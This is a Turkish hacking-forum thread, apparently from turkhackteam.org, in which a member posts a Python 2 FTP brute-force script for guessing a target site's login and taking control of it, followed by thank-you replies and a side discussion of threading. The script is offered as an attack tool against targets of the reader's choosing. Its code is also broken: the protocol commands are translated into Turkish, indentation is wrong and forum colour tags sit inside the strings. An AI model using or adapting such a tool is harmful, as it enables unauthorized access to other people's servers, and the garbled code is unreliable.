FTP Brute Force //Ar-Ge Klübü

AngelRayt

Uzman üye
13 Eki 2015
1,352
15
Python
FTP Brute Force //Ar-Ge Kulübü --AngelRayt

Python2 İçindir

Hedef sitenin başına ftp:// koyduğumuz zaman bizi bir kullanıcı adı şifre bölümü geklemektedir.

ftp://örneksite.com

TD95Xt.png

Bu kısımdan bahsetmekteyim.

Eğer kullanıcı adı şifreyi doğru girersek;

kd1Byy.png

Siteye istediğimiz her şey yapabiliriz.

Bunun için brute force yazdım. Kodlar aşağıda ki gibidir.

İp adresini hedef ip adresi yazmamız yeterlidir.
Username ve password kısımlarını passliste bağlamanız yeterli olacaktır.

Kod:
import socket
import re
import sys

def connection(ip,user,passw):
	sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	print "Deneniyor" + ip + ":" + user + ":" + passw
	sock.connect((ip,21))
	data = sock.recv(1024)
	sock.send('Kullanıcı Adı' + user +'\r\n')
	data = sock.recv(1024)
	sock.send('Şifre' + passw + '\r\n')
	data = sock.recv(1024)

return data

user = ("[COLOR="DarkRed"]kullanıcı adı buraya[/COLOR]")
password = ["test1","test2","test3",""] #şifreler

for password in password:
	print(connection('[COLOR="DarkRed"]ip adresi buraya[/COLOR]',user,password))

#AngelRayt
#Ar-Ge Klübü

Bu arada koda if koşuluyla :
530 login ise şifre[npass] girebilirsiniz.

Moderatör tarafında düzenlendi:

Socialmm

Katılımcı Üye
8 Ocak 2017
854
1
Ellerine Sağlık Dostum

Hocam Threading ile İlgili Bir Konu Açacak mısınız? Pythonda veya ne biliyim c# ta Çok Merak Ediyorum Ve de Müsaitseniz Soru Sormak İstiyorum...

aynen bende c# thread de zorlanıyorum örneğin listboxda denenecek pass lar var bir tane genel bi int oluşturuyorum ve bu int ye göre listboxdan item alıyorum ve onu taratıp int değerini bir arttırıyorum bu şekilde 2-3 tane thread de sıkıntı yok ancak çoklu thread olunca sıkıntı çıkıyor..

The Narkoz

Kıdemli Üye
19 Ağu 2017
2,783
1
Azerbaycan
Ellerine Sağlık Dostum

Hocam Threading ile İlgili Bir Konu Açacak mısınız? Pythonda veya ne biliyim c# ta Çok Merak Ediyorum Ve de Müsaitseniz Soru Sormak İstiyorum...

aynen bende c# thread de zorlanıyorum örneğin listboxda denenecek pass lar var bir tane genel bi int oluşturuyorum ve bu int ye göre listboxdan item alıyorum ve onu taratıp int değerini bir arttırıyorum bu şekilde 2-3 tane thread de sıkıntı yok ancak çoklu thread olunca sıkıntı çıkıyor..

https://www.turkhackteam.org/c-j-vb-net-net-dilleri/1701183-c-thread-nedir-nasil-kullanilir-ar-ge-narkoz.html

Eline sağlık

Moderatör tarafında düzenlendi:

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
388
Ankara
Ellerine Sağlık Dostum

Yani threading'in neresini anlatayım ki? Önceki konularımın bir çoğunda thread kullandım zaten.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.